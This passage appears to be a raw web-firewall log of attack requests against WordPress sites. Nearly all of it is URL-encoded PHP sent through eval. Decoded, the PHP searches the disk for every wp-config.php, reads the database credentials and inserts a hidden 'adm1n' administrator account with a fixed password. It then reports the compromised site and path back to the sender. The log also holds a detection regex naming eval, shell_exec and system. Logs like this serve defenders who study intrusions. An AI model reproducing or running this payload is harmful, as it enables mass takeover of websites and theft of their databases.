0%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/compat-utf8.php HTTP\/1.1\nsec-fetch-user:?1\nsec-fetch-site:none\naccept-encoding:gzip,deflate\ncontent-length:12663\nsec-fetch-mode:navigate\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-fetch-dest:document\ncontent-type:application\/x-www-form-urlencoded\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-ch-ua-mobile:?0\naccept:*\/*\nsec-ch-ua-platform:\"macOS\"\nupgrade-insecure-requests:1\nsec-ch-ua:\"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"\n\nfpVGge=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 00:07:20","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> AJ:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B